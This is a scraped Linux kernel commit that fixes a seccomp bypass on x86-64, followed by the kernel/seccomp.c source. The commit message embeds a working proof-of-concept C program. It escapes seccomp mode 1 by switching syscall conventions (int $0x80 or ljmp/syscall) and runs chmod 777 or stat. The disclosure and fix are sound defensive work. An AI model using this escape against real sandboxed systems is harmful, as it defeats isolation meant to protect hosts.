5b1017404a
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process can make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
86 lines
1.6 KiB
C
86 lines
1.6 KiB
C
/*
|
|
* linux/kernel/seccomp.c
|
|
*
|
|
* Copyright 2004-2005 Andrea Arcangeli <andrea@cpushare.com>
|
|
*
|
|
* This defines a simple but solid secure-computing mode.
|
|
*/
|
|
|
|
#include <linux/seccomp.h>
|
|
#include <linux/sched.h>
|
|
#include <linux/compat.h>
|
|
|
|
/* #define SECCOMP_DEBUG 1 */
|
|
/* Highest seccomp mode number that prctl_set_seccomp() accepts. */
#define NR_SECCOMP_MODES 1
|
|
|
|
/*
|
|
* Secure computing mode 1 allows only read/write/exit/sigreturn.
|
|
* To be fully secure this must be combined with rlimit
|
|
* to limit the stack allocations too.
|
|
*/
|
|
static int mode1_syscalls[] = {
|
|
__NR_seccomp_read, __NR_seccomp_write, __NR_seccomp_exit, __NR_seccomp_sigreturn,
|
|
0, /* null terminated */
|
|
};
|
|
|
|
#ifdef CONFIG_COMPAT
/*
 * Mode 1 whitelist built from the *_32 system call numbers.
 * __secure_computing() switches to this table when is_compat_task()
 * is true.  Terminated by a 0 sentinel, like mode1_syscalls.
 */
static int mode1_syscalls_32[] = {
	__NR_seccomp_read_32,
	__NR_seccomp_write_32,
	__NR_seccomp_exit_32,
	__NR_seccomp_sigreturn_32,
	0,	/* null terminated */
};
#endif
|
|
|
|
void __secure_computing(int this_syscall)
|
|
{
|
|
int mode = current->seccomp.mode;
|
|
int * syscall;
|
|
|
|
switch (mode) {
|
|
case 1:
|
|
syscall = mode1_syscalls;
|
|
#ifdef CONFIG_COMPAT
|
|
if (is_compat_task())
|
|
syscall = mode1_syscalls_32;
|
|
#endif
|
|
do {
|
|
if (*syscall == this_syscall)
|
|
return;
|
|
} while (*++syscall);
|
|
break;
|
|
default:
|
|
BUG();
|
|
}
|
|
|
|
#ifdef SECCOMP_DEBUG
|
|
dump_stack();
|
|
#endif
|
|
do_exit(SIGKILL);
|
|
}
|
|
|
|
long prctl_get_seccomp(void)
|
|
{
|
|
return current->seccomp.mode;
|
|
}
|
|
|
|
long prctl_set_seccomp(unsigned long seccomp_mode)
|
|
{
|
|
long ret;
|
|
|
|
/* can set it only once to be even more secure */
|
|
ret = -EPERM;
|
|
if (unlikely(current->seccomp.mode))
|
|
goto out;
|
|
|
|
ret = -EINVAL;
|
|
if (seccomp_mode && seccomp_mode <= NR_SECCOMP_MODES) {
|
|
current->seccomp.mode = seccomp_mode;
|
|
set_thread_flag(TIF_SECCOMP);
|
|
#ifdef TIF_NOTSC
|
|
disable_TSC();
|
|
#endif
|
|
ret = 0;
|
|
}
|
|
|
|
out:
|
|
return ret;
|
|
}
|